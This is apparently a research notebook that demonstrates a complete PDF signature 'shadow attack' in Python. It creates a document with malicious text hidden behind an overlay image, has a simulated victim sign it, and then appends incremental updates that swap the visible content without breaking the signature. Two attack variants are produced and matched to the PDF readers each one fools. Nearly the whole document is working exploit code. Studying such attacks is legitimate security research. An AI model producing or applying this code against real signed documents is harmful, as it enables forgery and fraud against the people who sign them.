# Step 0: Configuration Parameters

In [ ]:
malicious_text          = "You are fired!" # This text will be shown after the victim signed the PDF
overlay_content         = "Sign me to get a reward."

overlay_file            = "1_original-document.pdf"
filename_unsigned       = "2_original-document-shadowed.pdf"
filename_signed         = "3_original-document-shadowed-signed.pdf"
filename_manipulated1   = "4_original-document-shadowed-signed-manipulated_v1.pdf" # Attack Vector 1
filename_manipulated2   = "4_original-document-shadowed-signed-manipulated_v2.pdf" # Attack Vector 2

# Create overlay_file  = "1_original-document.pdf"
from fpdf import FPDF
pdf = FPDF()
pdf.add_page()
pdf.set_font('Arial', 'B', 24)
pdf.cell(20, 30, overlay_content)
pdf.output(overlay_file, 'F')
print(f"Successfully created {overlay_file}")

# Step 1: Prepare the Document for the Victim

The following script places an image of the first page of `filename_visible` in a prepared PDF (`filename_unsinged`).

In other words: `filename_visible` is shown, but it hides content behind it (`hidden_text`)

The attacker additionally places some metadata objects in the PDF that are later used to hide the image.

In [ ]:
from fpdf import FPDF
from wand.image import Image, Color

# We slightly extend FPDF for our attack
class PDF(FPDF):

    def _putcatalog(self):
         super()._putcatalog()
         self._out('/Metadata {:d} 0 R'.format(self.objectid_metadata))

    def _puttrailer(self):
        self._out('/Size '+str(self.n+1))
        self._out('/Root '+str(self.n)+' 0 R')
        self._out('/Info '+str(self.objectid_info)+' 0 R')

    def _putinfoobj(self):
        self._newobj()
        self.objectid_info = self.n
        self._out('<<')
        self._putinfo()
        self._out('>>')
        self._out('endobj')

    def xmpmeta(self):
        xml = """stream
<?xpacket begin="ï»¿" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.4-c006 80.159825, 2016/09/16-03:31:08        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/">
         <xmp:ModifyDate>2019-08-07T13:48:36+02:00</xmp:ModifyDate>
         <xmp:MetadataDate>2019-08-07T13:48:36+02:00</xmp:MetadataDate>
         <xmp:CreateDate>2019-08-07T11:14:22+02:00</xmp:CreateDate>
         <dc:format>application/pdf</dc:format>
         <xmpMM:DocumentID>uuid:d24ecc88-2a52-0b43-9272-3abe5e065c85</xmpMM:DocumentID>
         <xmpMM:InstanceID>uuid:9d3cd24f-99fe-0849-a303-c9cfac889c31</xmpMM:InstanceID>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
<?xpacket end="w"?>
endstream"""
        head = "<< /Subtype /XML /Type /Metadata /Length {:d} >>".format(len(xml))
        self._newobj()
        self.objectid_metadata = self.n
        self._out(head)
        self._out(xml)
        self._out('endobj')

    # Most Lines are copy&paste from FDPF, except for xmpmeta
    def _enddoc(self):
        self._putheader()
        self._putpages()
        self._putinfoobj()
        self.xmpmeta() # We place some metadata before the resources (image)
        self._putresources()
        #Catalog
        self._newobj()
        self._out('<<')
        self._putcatalog()
        self._out('>>')
        self._out('endobj')
        #Cross-ref
        o=len(self.buffer)
        self._out('xref')
        self._out('0 '+(str(self.n+1)))
        self._out('0000000000 65535 f ')
        for i in range(1,self.n+1):
            self._out("{:010d} 00000 n ".format(self.offsets[i]))
        #Trailer
        self._out('trailer')
        self._out('<<')
        self._puttrailer()
        self._out('>>')
        self._out('startxref')
        self._out(o)
        self._out('%%EOF')
        self.state=3

pdf = PDF()
pdf.add_page()
# Setup hidden Content
pdf.set_font('Arial', 'B', 24)
pdf.cell(20, 30, malicious_text) # e.g. You are fired!
# Convert malicious_filename to PNG
overlay_image = overlay_file.replace(".pdf", ".png")
with Image(filename=overlay_file, resolution=300) as img:
    with Image(width=img.width, height=img.height, background=Color("white")) as bg:
        bg.composite(img,0,0)
        bg.save(filename=overlay_image)
# Add overlay image to shadowed pdf
pdf.image(overlay_image,0,0,pdf.w) # Fullpage
pdf.set_author("Creator")
pdf.set_title("Sign me")
# Save unsigned PDF
pdf.output(filename_unsigned, 'F')
print(f"Successfully created {filename_unsigned}")

# Step 2: The Victim signs the document
We here simulate a victim who signs the document.

In [ ]:
import datetime
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.serialization import pkcs12

from endesive.pdf import cms

date = datetime.datetime.utcnow() - datetime.timedelta(hours=12)
date = date.strftime("D:%Y%m%d%H%M%S+00'00'")
dct = {
    "aligned": 0,
    "sigflagsft": 132,
    "sigpage": 0,
    "sigbutton": True,
    "sigfield": "Signature1",
    "sigandcertify": False,
    "signaturebox": (470, 840, 570, 640),
    "signature": "I ultimatively agree",
    "contact": "Signer",
    "location": "AoE",
    "signingdate": date,
    "reason": "No reason given",
    "password": "1234",
}
with open("../../../resources/pdf-signer/demo-rsa2048.p12", "rb") as fp:
    p12 = pkcs12.load_key_and_certificates(
        fp.read(), b"demo-rsa2048", backends.default_backend()
    )

data_unsigned = open(filename_unsigned, "rb").read()
data_signature = cms.sign(data_unsigned, dct, p12[0], p12[1], p12[2], "sha256")
with open(filename_signed, "wb") as fp:
    fp.write(data_unsigned)
    fp.write(data_signature)
print(f"Successfully created {filename_signed}")

# Step 3: Creating the Attack / Exploit

The attacker now manipulated the signed PDF.

Please note that the attack creates a new PDF that contains all originally signed data.

The attacker uses an Incremental Update to hide the picture.

The code create two attack vectors:

* v1 works e.g. in Adobe, MasterPDF
* v2 works e.g. in Foxit, MasterPDF, Nitro5

In [ ]:
import sys
sys.path.append('../../../resources/lib/')
from pdfmanipulation import *
data_signed_pdf = data_unsigned + data_signature

objectid_image = 8
start_object = len(data_signed_pdf)
objectid_info = pdf.objectid_metadata
info_obj = getObjectByReference(data_unsigned,objectid_info,0)[0][0]

start_xref = "{:d}".format(start_object + len(info_obj) + 1).encode()
xref = """
xref
0 1 
0000000000 65535 f 
{:d} 1 
{:010d} 00000 n 
{:d} 1 
{:010d} 00000 n 
""".format(
    objectid_info, len(data_signed_pdf),
    objectid_image, len(data_signed_pdf),
    ).encode()

signedTrailer = getTrailer(data_signature)
ref_root = signedTrailer[0].group("root")
ref_info = signedTrailer[0].group("info")
size = signedTrailer[0].group("size")
prev = getStartxref(data_signature)[0].group("value")

trailer = b"""trailer
<<
/Size """+size+b"""
/Root """+ref_root+b"""
/Info """+ref_info+b"""
/Prev """+prev+b"""
>>
startxref
"""+start_xref+b"""
%%EOF
"""

# Write Vector 1
with open(filename_manipulated1, "wb") as fp:
    fp.write(data_signed_pdf)
    fp.write(info_obj)
    fp.write(xref)
    fp.write(trailer)
print(f"Successfully created {filename_manipulated1}")

# Write Vector 2
with open(filename_manipulated2, "wb") as fp:
    fp.write(data_signed_pdf)
    # Difference: Choose Image ID as obj ID for Metadata
    info_obj = "{:d}".format(objectid_image).encode() + info_obj[len("{:d}".format(objectid_info)):] # replace obj number
    fp.write(info_obj)
    fp.write(xref)
    fp.write(trailer)
print(f"Successfully created {filename_manipulated2}")